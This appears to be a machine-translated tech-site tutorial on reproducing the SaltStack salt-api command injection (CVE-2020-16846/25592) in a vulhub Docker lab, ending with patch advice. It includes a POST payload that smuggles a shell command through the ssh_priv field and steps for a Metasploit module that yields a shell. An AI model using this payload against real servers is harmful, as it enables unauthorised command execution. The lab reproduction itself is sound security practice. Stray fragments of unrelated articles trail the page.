In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-03-30 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
What this article shares with you is about how to reproduce SaltStack command injection loopholes. The editor thinks it is very practical, so I share it with you. I hope you can get something after reading this article.
Introduction to 0x00
SaltStack is a centralized management platform for server infrastructure, with configuration management, remote execution, monitoring and other functions, based on Python language, combined with lightweight message queuing (ZeroMQ) and Python third-party modules (Pyzmq, PyCrypto, Pyjinjia2, python-msgpack and PyYAML, etc.). By deploying SaltStack, we can execute commands in batches on tens of millions of servers, configure centralized management, distribute files, collect server data, operating system foundation and software package management according to different services.
Overview of 0x01 vulnerabilities
A combination of CVE-2020-16846 and CVE-2020-25592 can execute arbitrary commands through the salt-api interface without authorization. CVE-2020-25592 allows any user to call the SSH module, and CVE-2020-16846 allows the user to execute arbitrary commands.
0x02 affects version
SaltStack 2015/2016/2017/2018/2019/3000/3001/3002
0x03 environment building
1. It is complicated to build this vulnerability manually. Use the docker environment in vulhub to build and download it and decompress it.
Wget https://github.com/vulhub/vulhub/archive/master.zip-O vulhub-master.zipunzip vulhub-master.zip
2. Enter the vulnerability directory and use docker-compose to start the vulnerability environment. If you see a green done, the startup is successful.
Cd vulhub/saltstack/CVE-2020-16846/docker-compose up-d
3. Access https://your-ip:8000 in the browser. This is the API port of Salt. Note: https access is required
Recurrence of 0x04 vulnerabilities
1. Visit the following link in url, use burp to grab the packet and send it to the playback module
Https://your-ip:8000/run
2. Modify get to post transmission, construct the following data packet to write to the file, and click send.
Token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa | touch%20/tmp/success%3b
3. Return 200ok and go to the docker container to check whether the file has been written successfully.
4. Use exp in msf to exploit vulnerabilities, launch msf, select attack module, configure information, execute with run or exploit, and get shell after execution.
Msfconsoleuse exploit/linux/http/saltstack_salt_api_cmd_execshow options
0x05 repair recommendation
1. It is recommended to download and install this vulnerability patch at the official download address:
Https://gitlab.com/saltstack/open/salt-patches
2. Upgrade to the secure version and download it at:
Https://repo.saltstack.com/
The above is how to reproduce the SaltStack command injection loophole. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
Cmz@leco:~/test$ echo'1' > file1 # begins to put 1cmz collectors echo'2' > fil in the file1